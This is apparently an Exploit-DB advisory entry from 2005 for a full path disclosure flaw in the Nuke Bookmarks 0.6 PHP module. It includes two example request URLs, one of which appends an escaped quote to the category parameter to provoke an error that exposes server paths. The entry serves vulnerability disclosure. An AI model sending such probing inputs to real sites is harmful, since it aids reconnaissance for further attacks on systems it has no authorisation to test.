Nuke BookMarks 0.6 - 'Marks.php' Full Path Disclosure

EDB-ID:

25282

CVE:

N/A




Platform:

PHP

Date:

2005-03-26


source: https://www.securityfocus.com/bid/12906/info

Nuke Bookmarks is prone to a path disclosure issue when invalid data is submitted.

This issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. 

http://www.example.com/modules.php?name=Bookmarks&file=marks
http://www.example.com/modules.php?name=Bookmarks&file=marks&category=1\'